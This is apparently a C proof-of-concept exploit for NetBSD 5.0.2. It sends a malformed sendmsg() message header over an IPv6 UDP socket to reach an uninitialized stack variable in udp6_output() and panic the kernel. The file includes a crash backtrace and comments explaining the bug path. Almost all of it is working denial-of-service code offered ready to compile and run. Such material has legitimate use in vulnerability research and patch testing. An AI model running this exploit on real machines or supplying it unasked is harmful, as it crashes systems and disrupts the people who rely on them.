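/**
 * udp6ownage.c - udp6_output() uninitialized stack local kernel panic exploit
 *
 * Proof of concept, tested against NetBSD 5.0.2.
 *
 * WARNING: on a vulnerable kernel this program does not return from sendmsg();
 * the kernel panics (see the trace below).  Run it only on a throw-away test
 * machine you are prepared to lose.  It is a denial-of-service trigger, not a
 * privilege escalation.
 *
 * What the trace shows: udp6_output() reaches ip6_clearpktopts(), which calls
 * malloc() with a garbage size (1122380) and flags (-1) read from a stack
 * local that was never initialized, and the kernel traps.  The bogus
 * msg_name (too short to be a sockaddr_in6) and the bogus msg_control are the
 * inputs that steer udp6_output() down that path.
 *
 * foo:~ % ./udp6ownage
 * (...)
 * #9  0xc010cbe0 in calltrap ()
 * #10 0xc0466be6 in malloc (size=1122380, ksp=0xc0a7efe0, flags=-1) at ../../../../kern/kern_malloc.c:375
 * #11 0xc019a039 in ip6_clearpktopts (pktopt=0xc712ba68, optname=-1) at ../../../../netinet6/ip6_output.c:2306
 * #12 0xc01a8bda in udp6_output (in6p=0xc10a6f34, m=0xc0ee1e00, addr6=0xc0ee1d00, control=0xc0ee1f00, l=0xc71155a0) at ../../../../netinet6/udp6_output.c:198
 * #13 0xc01a9dc8 in udp6_usrreq (so=0x4, req=9, m=0xc0ee1e00, addr6=0xc0ee1d00, control=0xc0ee1f00, l=0xc71155a0) at ../../../../netinet6/udp6_usrreq.c:330
 * #14 0xc0191c61 in udp6_usrreq_wrapper (a=0xc0efab40, b=9, c=0xc0ee1e00, d=0xc0ee1d00, e=0xc0ee1f00, f=0xc71155a0) at ../../../../netinet6/in6_proto.c:152
 * (...)
 *
 * (c) Copyright 2o1o - Clement LECIGNE
 */

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/*
 * Build the malformed msghdr and hand it to the kernel over an AF_INET6 UDP
 * socket.  No user-controlled input is consumed; argc/argv are unused.
 *
 * Returns 0 if sendmsg() came back (i.e. the kernel survived, so it is
 * presumably patched or not affected), 1 if the socket could not be created.
 * On a vulnerable kernel it never returns.
 */
int main(int argc, char **argv)
{
	/*
	 * msg_name is 9 bytes including the NUL: far shorter than a
	 * struct sockaddr_in6, which is what udp6_output() expects addr6
	 * to be.  msg_control is likewise junk where cmsg headers belong.
	 */
	char name[] = "EV1LN4M3";
	char control[] = "MOUH4H4H4H4H4H4";
	struct msghdr msg;
	int s;

	(void)argc;
	(void)argv;

	s = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);
	if (s < 0) {
		perror("socket");
		exit(1337);
	}

	/* Designated initializer: every field set explicitly, nothing left stale. */
	msg = (struct msghdr){
		.msg_name       = name,		/* bogus addr6 for udp6_output() */
		.msg_namelen    = sizeof(name),
		.msg_iov        = NULL,		/* no payload at all */
		.msg_iovlen     = 0,
		.msg_control    = control,	/* bogus control mbuf */
		.msg_controllen = sizeof(control),
		.msg_flags      = -1,
	};

	/*
	 * On an affected 5.0.2 kernel this call panics the box and never
	 * returns.  If we get here, report what the kernel said: a patched
	 * kernel should reject the short msg_name with an error.
	 */
	if (sendmsg(s, &msg, 0) < 0) {
		perror("sendmsg");
	}

	close(s);
	fprintf(stderr, "sploit fucked\n");
	return 0;
}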